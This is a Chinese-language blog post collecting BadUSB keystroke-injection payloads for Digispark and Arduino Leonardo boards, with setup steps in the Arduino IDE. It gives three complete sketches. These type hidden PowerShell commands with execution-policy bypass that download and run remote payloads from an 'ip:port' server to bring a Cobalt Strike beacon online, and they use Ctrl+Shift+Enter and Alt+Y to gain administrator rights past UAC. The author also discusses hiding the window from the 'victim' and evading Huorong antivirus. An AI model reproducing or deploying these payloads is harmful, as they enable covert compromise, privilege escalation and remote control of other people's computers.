badusb整理
This_is_Y Lv6
 2022-01-08 10:48:33  

badusb整理

badusb,目前我手上有的有两种,digispark和 leonardo,淘宝上都有,随便买

两类开发板适用的代码有区别,个人感觉leonardo的更好用,

digispark

打开arduino,工具-开发板-Digistump AVR Boards-Digispark(Default-16.5mhz)

然后开始写代码就行了

image-20220108110030720

代码要写入到设备时,点击上传,等他出现编译好后,会出现

image-20220108111150309

这时候把badusb插入就好了。

payload1

这个payload是用win+r打开运行窗口,执行powershell上线cs的命令,缺点是火绒会拦截执行隐藏powershell这一行为,目前还没想到怎么绕过。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_SHIFT 225
#define KEY_CAPS_LOCK  57
void setup() {


DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(30);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);//按R和win键,打开运行
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);//按CAP绕过输入法
DigiKeyboard.print("powershell -w Normal -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1');");
DigiKeyboard.sendKeyPress(0);//松开
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(MOD_SHIFT_LEFT,MOD_CONTROL_LEFT);
DigiKeyboard.sendKeyStroke(0,KEY_ENTER);
DigiKeyboard.sendKeyPress(0);//松开
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_Y);
DigiKeyboard.sendKeyPress(0);//松开
}
void loop() {
}

leonardo

打开arduino,工具-开发板-Arduino AVR Boards-Arduino Leonardo

image-20220108111436120

然后插入设备,选择端口,

image-20220108111622289

这个开发板需要把代码写入设备时,直接点上传就好了

payload1

这个payload是win+打开命令窗口。执行powershell命令,然后用ctrl+shift+enter的方式,以管理员身份执行命令(以获取管理员权限),然后用alt+Y绕过UAC,缺点是火绒同样会拦截执行隐藏powershell这一行为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <Keyboard.h>
#include <Mouse.h>

void setup() { 
    delay(5000);
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press('r');
    Keyboard.releaseAll();
    delay(500);
    
    Keyboard.press(KEY_CAPS_LOCK);
    Keyboard.print("powershell -w Normal -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:port/payload');");
    Keyboard.release(KEY_CAPS_LOCK);
    
    delay(500);
    Keyboard.press(KEY_LEFT_CTRL);
    Keyboard.press(KEY_LEFT_SHIFT);
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(1500);
    
    Keyboard.press(KEY_LEFT_ALT);
    Keyboard.press('y');  
    Keyboard.releaseAll();  
    delay(1500);
    
 }
  
void loop() {}

payload2

这个payload是打开一个命令行窗口,然后让他最小化,让受害者不能第一时间看到代码,这样操作更容易绕过一些杀软,也有更多的操作空间

具体命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(300);//延时
Keyboard.press(KEY_LEFT_GUI);//win 键
delay(500);
Keyboard.press('r');//r 键
delay(500); 
Keyboard.release(KEY_LEFT_GUI); 
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");  //使用最小化隐藏cmd 窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN 
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(200); 

Keyboard.println("powershell");
delay(50);
Keyboard.println("$clnt = new-object system.net.webclient;"); 
delay(50); //短暂的延迟一下,太快会导致代码出错
Keyboard.println("$url='http://ip:port/payload';"); //ip,端口,payload,确保可以访问
delay(50);
Keyboard.println("$file = \"E:\\payload\\test1\";"); //下载到目标存放文件的地址,文件路径要\\
delay(50);
Keyboard.println("$clnt.downloadfile($url,$file);");  //用分段执行绕过进程防护Keyboard.println("c:\\windows\\temp\\hy.exe"); //这里可以自行研究隐藏文件放到D盘,因为C盘可能没权限。思路:可使用attrib +h 1.txt 将文件隐藏

Keyboard.println("exit");//退出当前powershell窗口
delay(3000);//等待下载完成,
Keyboard.println("exit"); //退出cmd小窗口
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK); 
Keyboard.end();//结束键盘通讯
}

void loop() {
// put your main code here, to run repeatedly:
}
 Comments